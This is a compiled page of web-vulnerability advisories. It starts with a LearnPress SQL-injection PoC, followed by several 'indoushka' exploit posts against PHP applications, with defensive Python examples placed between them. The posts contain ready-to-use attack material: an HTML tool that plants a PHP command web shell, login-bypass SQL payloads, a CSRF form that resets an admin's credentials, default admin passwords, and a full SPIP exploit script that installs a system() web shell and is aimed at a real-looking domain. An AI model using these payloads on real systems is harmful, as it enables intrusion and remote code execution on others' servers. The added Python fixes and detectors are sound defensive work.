<pre><code># CVE-2024-8522<br />LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields'<br /><br />## Stack<br /><br />```txt<br />class-lp-db.php:702, LP_Database->execute()<br />class-lp-course-db.php:564, LP_Course_DB->get_courses()<br />Courses.php:241, LearnPress\Models\Courses::get_courses()<br />class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()<br />class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()<br />class-wp-rest-server.php:1063, WP_REST_Server->dispatch()<br />class-wp-rest-server.php:439, WP_REST_Server->serve_request()<br />rest-api.php:420, rest_api_loaded()<br />class-wp-hook.php:324, WP_Hook->apply_filters()<br />class-wp-hook.php:348, WP_Hook->do_action()<br />plugin.php:565, do_action_ref_array()<br />class-wp.php:418, WP->parse_request()<br />class-wp.php:813, WP->main()<br />functions.php:1336, wp()<br />wp-blog-header.php:16, require()<br />index.php:17, {main}()<br />```<br /><br /><br />## <><br /><br />```txt<br />SELECT <> FROM wp_posts AS p WHERE 1=1 AND p.post_type = 'lp_course' AND p.post_status IN ('publish') ORDER BY post_date DESC LIMIT 0, 10<br />```<br /><br /><br />## PoC<br /><br />```http<br />GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1<br />Host: localhost:8077<br />User-Agent: curl/7.81.0<br />Cookie: XDEBUG_SESSION=PHPSTORM<br />Accept: */*<br />```<br /><br /><br /></code></pre>
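As an added defensive example (not part of the advisory and not LearnPress code), the Python below shows the fix for this bug class, an identifier allowlist applied to `c_only_fields` before it is interpolated into the SELECT shown above, together with a small access-log scan that flags requests whose parameter would fail that check. The column allowlist, the sample log lines and the `/wp-json/learnpress/v1/courses` path handling are assumptions constructed for this example; the plugin's real permitted field set is not stated on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist: the wp_posts columns a course listing legitimately
# needs. Assumption: the real plugin's permitted field set is not on the page.
ALLOWED_FIELDS = {"ID", "post_title", "post_name", "post_date", "post_status"}

# One SQL identifier, optionally table-qualified (p.post_title); nothing else.
IDENTIFIER_RE = re.compile(r"^(?:[A-Za-z_][A-Za-z0-9_]*\.)?[A-Za-z_][A-Za-z0-9_]*$")


def safe_only_fields(raw, allowed=ALLOWED_FIELDS):
    """Return a validated, comma-separated column list, or None if any item
    is not a bare identifier from the allowlist. Interpolating the raw value
    into "SELECT <fields> FROM wp_posts" is the defect in the advisory; the
    caller must only ever interpolate what this function returns."""
    fields = []
    for item in raw.split(","):
        item = item.strip()
        base = item.split(".", 1)[-1]
        if not IDENTIFIER_RE.match(item) or base not in allowed:
            return None
        fields.append(item)
    return ", ".join(fields) if fields else None


def build_select(raw_fields):
    """The query shape from the stack trace, hardened by validation."""
    fields = safe_only_fields(raw_fields)
    if fields is None:
        raise ValueError("c_only_fields rejected")
    return (f"SELECT {fields} FROM wp_posts AS p WHERE 1=1 "
            "AND p.post_type = 'lp_course' AND p.post_status IN ('publish') "
            "ORDER BY post_date DESC LIMIT 0, 10")


def suspicious_requests(log_lines):
    """Flag access-log requests to the courses endpoint whose c_only_fields
    value would fail validation; returns (path, raw_value) pairs."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.startswith("/wp-json/learnpress/v1/courses"):
            continue
        for value in parse_qs(url.query).get("c_only_fields", []):
            if safe_only_fields(value) is None:
                hits.append((url.path, value))
    return hits


# Constructed sample log lines (not captured from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Sep/2024:10:00:00 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=ID,post_title HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Sep/2024:10:00:07 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!%3D-2,(SLEEP(10)),0) HTTP/1.1" 200 88',
    '10.0.0.9 - - [01/Sep/2024:10:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 3001',
]

if __name__ == "__main__":
    print(build_select("ID, post_title"))
    for path, value in suspicious_requests(SAMPLE_LOG):
        print("suspicious:", path, repr(value))
```

The allowlist is the real control: rejecting anything that is not a known column name is simpler and more robust than trying to block SQL keywords, and the same function doubles as the detection predicate over historical logs.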
<pre><code>=============================================================================================================================================<br />| # Title : Prison Management System v1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] This HTML page is designed to create a file and inject PHP code.<br /><br />[+] save payload as poc.html <br /><br />[+] In line 13, 'content[welcome]' names the file you want to create. It will create a file with an HTML extension, <br /><br /> and in the same line, put the payload that suits you.<br /><br />[+] Set your target url<br /><br />[+] payload : <br /><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title> PHP code injection Tool</title><br /> <script><br /> async function sendRequest() {<br /> const url = document.getElementById('url').value;<br /> const postData = {<br /> 'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`<br /> };<br /><br /> try {<br /> const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {<br /> method: 'POST',<br /> headers: {<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> },<br /> body: new URLSearchParams(postData).toString()<br /> });<br /><br /> if (response.ok) {<br /> document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';<br /><br /> } 
else {<br /> document.getElementById('result').innerText = 'Error: ' + response.statusText;<br /> }<br /> } catch (error) {<br /> document.getElementById('result').innerText = 'Error making request: ' + error.message;<br /> }<br /> }<br /> </script><br /></head><br /><body><br /> <h1>Injection Tool</h1><br /> <form onsubmit="event.preventDefault(); sendRequest();"><br /> <label for="url">Enter URL:</label><br /> <input type="text" id="url" name="url" required><br /> <button type="submit">Submit</button><br /> </form><br /> <pre id="result"></pre><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : PreSchool Enrollment System 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/pre-school-enrollment-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : USer & PASs : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/preschool/admin/index.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SchoolPlus v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to line 5. Set the target site link, save changes and apply. <br /><br />[+] infected file : cms/user/modify.php.<br /><br />[+] http://127.0.0.1/q7.3/cms/user/modify.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"><br /> </div><br /> <tr><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="active" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' Value='Reset'><br /> 
</div><br /> </form><br /> </div><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Security Guard Hiring System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/online-security-guards-hiring-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: john@test.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/osghs/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Food Management System 1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_onlinefood-php-zip.zip |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##<br /><br />[+] http://127.0.0.1/OnlineFood-PHP/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
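The two auth-bypass advisories above (PreSchool Enrollment System and Online Food Management System) both depend on a login query assembled by string concatenation. As an added example that belongs to neither advisory nor either vendor's code, the SQLite script below puts that vulnerable query shape beside its parameterised replacement so the difference can be observed offline. The table, the stored credential and the function names are constructed for the example, and the comment marker in the payload is changed from MySQL's `#` to `--` because SQLite does not treat `#` as a comment.

```python
import sqlite3


def make_db():
    """Constructed in-memory admin table (not from either vendor's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admins (username, password) VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the shape behind the advisories' bypass.
    Whatever the user types becomes part of the SQL text, so a quote
    closes the literal and 'or 0=0' makes the WHERE clause always true."""
    sql = (f"SELECT id FROM admins WHERE username='{username}' "
           f"AND password='{password}'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def login_parameterized(conn, username, password):
    """Bound parameters: the input is data, never SQL, so the same payload
    is compared literally against the stored value and the login fails."""
    sql = "SELECT id FROM admins WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The advisories' payload ends in MySQL's ## comment; SQLite only knows --,
# so the marker is swapped to keep the demonstration runnable offline.
BYPASS = "' or 0=0 --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload   :", login_vulnerable(db, BYPASS, BYPASS))
    print("parameterized, bypass payload:", login_parameterized(db, BYPASS, BYPASS))
    print("parameterized, real password :", login_parameterized(db, "admin", "correct-horse-battery"))
```

The comparison is against a plaintext password only to keep the query shape visible; a real handler looks the user up by username alone and verifies a salted hash of the submitted password in application code, which keeps the password out of the SQL entirely.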
<pre><code>=============================================================================================================================================<br />| # Title : SPIP BigUp 4.1.17 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.<br /> The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. <br /> By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. <br /> It allows unauthenticated users to execute arbitrary code remotely via the public interface. <br /><br /><br />[+] Line 143 : Set your target & payload.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br />class indoushka {<br /> private $targetUri;<br /> private $formPage;<br /> private $payload;<br /><br /> public function __construct($targetUri, $formPage = 'auto', $payload) {<br /> $this->targetUri = $targetUri;<br /> $this->formPage = $formPage;<br /> $this->payload = $payload;<br /> }<br /><br /> public function check() {<br /> $spipVersion = $this->getSpipVersion();<br /> if (!$spipVersion) {<br /> return "Unable to determine the version of SPIP.";<br /> }<br /> echo "SPIP Version detected: " . $spipVersion . 
"\n";<br /><br /> $vulnerableRanges = [<br /> ['start' => '4.0.0', 'end' => '4.1.17'],<br /> ['start' => '4.2.0', 'end' => '4.2.15'],<br /> ['start' => '4.3.0', 'end' => '4.3.1']<br /> ];<br /><br /> $isVulnerable = false;<br /> foreach ($vulnerableRanges as $range) {<br /> if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {<br /> $isVulnerable = true;<br /> break;<br /> }<br /> }<br /><br /> if (!$isVulnerable) {<br /> return "The detected SPIP version ($spipVersion) is not vulnerable.";<br /> }<br /><br /> echo "SPIP version $spipVersion is vulnerable.\n";<br /> return "SPIP version $spipVersion is vulnerable.";<br /> }<br /><br /> private function getSpipVersion() {<br /> // This function should make an HTTP request to detect the SPIP version<br /> // Return the version or false if undetectable<br /> return '4.3.1'; // Example version, replace with actual logic<br /> }<br /><br /> private function getFormData() {<br /> $pages = ['login', 'spip_pass', 'contact'];<br /><br /> if ($this->formPage !== 'auto') {<br /> $pages = [$this->formPage];<br /> }<br /><br /> foreach ($pages as $page) {<br /> $url = $this->normalizeUri($page);<br /> $response = $this->sendRequest('GET', $url);<br /><br /> if ($response['status'] === 200) {<br /> libxml_use_internal_errors(true); // Prevent warnings from invalid HTML<br /> $doc = new DOMDocument();<br /> @$doc->loadHTML($response['body']);<br /> libxml_clear_errors();<br /><br /> $inputs = $doc->getElementsByTagName('input');<br /> if ($inputs->length > 1) {<br /> $action = $inputs->item(0)->getAttribute('value');<br /> $args = $inputs->item(1)->getAttribute('value');<br /> <br /> if ($action && $args) {<br /> echo "Found formulaire_action: $action\n";<br /> echo "Found formulaire_action_args: " . substr($args, 0, 20) . 
"...\n";<br /> return ['action' => $action, 'args' => $args];<br /> }<br /> }<br /> }<br /> }<br /><br /> return null;<br /> }<br /><br /> private function normalizeUri($page) {<br /> return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');<br /> }<br /><br /> private function sendRequest($method, $url, $data = null) {<br /> $ch = curl_init();<br /><br /> curl_setopt($ch, CURLOPT_URL, $url);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> if ($method === 'POST' && $data) {<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)<br /> ]);<br /> }<br /><br /> $response = curl_exec($ch);<br /> $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);<br /><br /> curl_close($ch);<br /><br /> return ['status' => $httpCode, 'body' => $response];<br /> }<br /><br /> private function encodePayload() {<br /> return base64_encode($this->payload);<br /> }<br /><br /> public function exploit() {<br /> $formData = $this->getFormData();<br /> if (!$formData) {<br /> echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";<br /> return;<br /> }<br /><br /> echo "Preparing to send exploit payload to the target...\n";<br /><br /> $encodedPayload = $this->encodePayload();<br /> $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));<br /><br /> $postData = "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . 
$this->randomString() . '"' . "\r\n\r\n\r\n";<br /> $postData .= "--$boundary\r\n";<br /> $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";<br /> $postData .= "--$boundary--\r\n";<br /><br /> $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);<br /> }<br /><br /> private function randomString($length = 8) {<br /> return bin2hex(random_bytes($length / 2));<br /> }<br />}<br /><br />// Usage example:<br />$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');<br />$exploit->check();<br />$exploit->exploit();<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
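The SPIP advisory above turns on a multipart part whose name and filename carry code where an identifier belongs. As an added example (not from the advisory and not SPIP's code), the Python below parses a multipart/form-data body with the standard-library email parser and refuses any part whose name or filename falls outside a strict character set, the check an upload handler should apply before it ever uses those strings in a path or an expression. The regular expressions, the constructed request bodies and the `reject_unsafe_parts` name are assumptions made for this example; the tainted sample uses an inert placeholder rather than the advisory's payload.

```python
import email
import re

# Part names a form handler may accept: letters, digits, underscore, dot,
# dash, and one level of [key] indexing for array-style fields.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]+(?:\[[A-Za-z0-9_-]*\])?$")
# Filenames: a bare name only, so no separators, quotes or brackets.
SAFE_FILENAME_RE = re.compile(r"^[A-Za-z0-9_.-]+$")


def parse_multipart(content_type, body):
    """Split a multipart/form-data body into (name, filename, payload) triples.
    multipart/form-data is ordinary MIME, so the email parser handles it."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        parts.append((name, filename, part.get_payload(decode=True) or b""))
    return parts


def reject_unsafe_parts(content_type, body):
    """Return the reasons the request must be refused; an empty list means
    every part name and filename is a plain identifier."""
    problems = []
    for name, filename, _ in parse_multipart(content_type, body):
        if name is None or not SAFE_NAME_RE.match(name):
            problems.append(f"bad part name: {name!r}")
        if filename is not None and not SAFE_FILENAME_RE.match(filename):
            problems.append(f"bad filename: {filename!r}")
    return problems


def build_body(boundary, fields):
    """Constructed request builder for the samples below (not from the page)."""
    out = b""
    for name, filename, value in fields:
        out += f"--{boundary}\r\n".encode()
        disposition = f'Content-Disposition: form-data; name="{name}"'
        if filename is not None:
            disposition += f'; filename="{filename}"'
        out += disposition.encode() + b"\r\n\r\n" + value + b"\r\n"
    return out + f"--{boundary}--\r\n".encode()


BOUNDARY = "----constructedBoundary1234"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"

# Clean request: an ordinary field and an ordinary file part.
CLEAN = build_body(BOUNDARY, [("formulaire_action", None, b"contact"),
                              ("avatar", "me.png", b"fakepng")])
# Tainted request: punctuation where an identifier belongs and a path in the
# filename. The text is an inert placeholder, not the advisory's payload.
TAINTED = build_body(BOUNDARY, [("x[.die()]", "../evil.php", b"")])

if __name__ == "__main__":
    print("clean  :", reject_unsafe_parts(CONTENT_TYPE, CLEAN))
    print("tainted:", reject_unsafe_parts(CONTENT_TYPE, TAINTED))
```

Validating the part name and filename as identifiers, rather than trying to strip dangerous fragments out of them, is what removes the class of bug: nothing in either string can reach an expression or a path unless it matches the allowlist.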
<pre><code>====================================================================================================================================<br />| # Title : Online Exam System 1.0 HTML Form found in redirect page Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_exam-zip.zip |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302. <br /> Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. <br /><br />Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br />This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. <br />An attacker can access the content of the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). <br />This creates an authentication bypass vulnerability. <br />The correct code would be <br /><br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> exit();<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... 
the rest of the administration page ... --><br /><br />This vulnerability affects /exam/admin/quesadd.php. <br /><br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
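The advisory's fix is the `exit()` after `header()`. As an added example (not part of the advisory), the Python below is the matching check a defender can run against their own deployment: fetch a page without following redirects and report any `<form>` that arrives in the body of a 3xx response. The constructed responses, the `FormFinder` and `NoRedirect` classes and the `fetch_without_redirect` helper are assumptions made for this example.

```python
import urllib.error
import urllib.request
from html.parser import HTMLParser

REDIRECT_CODES = {301, 302, 303, 307, 308}


class FormFinder(HTMLParser):
    """Collect (action, method) for every <form> tag in a document."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            a = dict(attrs)
            self.forms.append((a.get("action") or "", (a.get("method") or "get").lower()))


def forms_in(body):
    finder = FormFinder()
    finder.feed(body)
    return finder.forms


def leaked_forms(status, headers, body):
    """Forms served in the body of a redirect response. A client that ignores
    the Location header sees exactly this content, which is what a missing
    exit() after header("Location: ...") exposes. Returns [] for
    non-redirects and for redirects whose body carries no form."""
    if status not in REDIRECT_CODES:
        return []
    if "location" not in {k.lower() for k in headers}:
        return []
    return forms_in(body)


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib hand back the 3xx response instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_without_redirect(url):
    """Fetch one URL of your own application and return (status, headers,
    body) even when it redirects. Hypothetical helper; not exercised offline."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")


# Constructed responses, not captured from any real deployment.
PROTECTED_RESPONSE = (302, {"Location": "auth.php"}, "")
LEAKY_RESPONSE = (
    302,
    {"Location": "auth.php"},
    "<title>Administration page</title>"
    '<form action="/admin/action" method="post"><input name="q"></form>',
)
NORMAL_PAGE = (200, {}, '<form action="/search" method="get"></form>')

if __name__ == "__main__":
    for label, resp in (("protected", PROTECTED_RESPONSE), ("leaky", LEAKY_RESPONSE)):
        print(label, leaked_forms(*resp))
```

A redirect that carries a body is not by itself a defect; the signal is a body that still contains the protected page's form, which is exactly what the `exit()` removes.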
<pre><code>====================================================================================================================================<br />| # Title : Old Age Home Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/blms/banker/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Nipah virus (NiV) – Testing Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/nipah-tms/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
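The three Insecure Settings advisories above (Online Security Guard Hiring System, Old Age Home Management System and Nipah virus Testing Management System) each name a default administrative account that survives installation. As an added example (not from the advisories or the vendor), the Python below audits an exported admin table for credentials that still equal a known default. It assumes the audited application stores passwords as plaintext, unsalted MD5 or SHA-256 hex digests; that is an assumption about the software, not a fact stated on the page, and the sample export is constructed.

```python
import hashlib

# Default accounts named in the three advisories above.
KNOWN_DEFAULTS = [("admin", "Test@123"), ("john@test.com", "Test@123")]
DEFAULT_PASSWORDS = sorted({pw for _, pw in KNOWN_DEFAULTS})

HEX = set("0123456789abcdef")


def detect_scheme(stored):
    """Guess how a stored credential is encoded from its shape. Assumption:
    the audited application uses plaintext, unsalted MD5 or SHA-256 hex;
    salted formats such as bcrypt ($2y$...) are reported as unknown and
    skipped, since they cannot be compared without the salt logic."""
    s = stored.lower()
    if len(s) == 32 and set(s) <= HEX:
        return "md5"
    if len(s) == 64 and set(s) <= HEX:
        return "sha256"
    if stored.startswith("$"):
        return "unknown"
    return "plain"


def encode(scheme, password):
    """Encode a candidate password the way the audited table stores it."""
    data = password.encode()
    if scheme == "md5":
        # Only used to recognise legacy hashes, hence usedforsecurity=False.
        return hashlib.md5(data, usedforsecurity=False).hexdigest()
    if scheme == "sha256":
        return hashlib.sha256(data).hexdigest()
    return password


def audit_accounts(accounts, default_passwords=DEFAULT_PASSWORDS):
    """Return (username, matched_default, scheme) for every account whose
    stored credential equals one of the known default passwords."""
    findings = []
    for username, stored in accounts:
        scheme = detect_scheme(stored)
        if scheme == "unknown":
            continue
        for pw in default_passwords:
            candidate = encode(scheme, pw)
            hit = candidate == stored if scheme == "plain" else candidate == stored.lower()
            if hit:
                findings.append((username, pw, scheme))
    return findings


# Constructed export of an admin table (not from any vendor's database).
SAMPLE_ACCOUNTS = [
    ("admin", encode("md5", "Test@123")),
    ("ops", encode("md5", "unique-pass-7c21")),
    ("john@test.com", "Test@123"),
    ("svc", "$2y$10$placeholder-bcrypt-hash-not-a-real-value"),
]

if __name__ == "__main__":
    for username, pw, scheme in audit_accounts(SAMPLE_ACCOUNTS):
        print(f"default credential still set: {username} ({scheme}) = {pw}")
```

Run against a fresh installation this reports the vendor's seeded account before the application is exposed; the same check belongs in a post-deployment smoke test so a reinstall cannot quietly reintroduce the default.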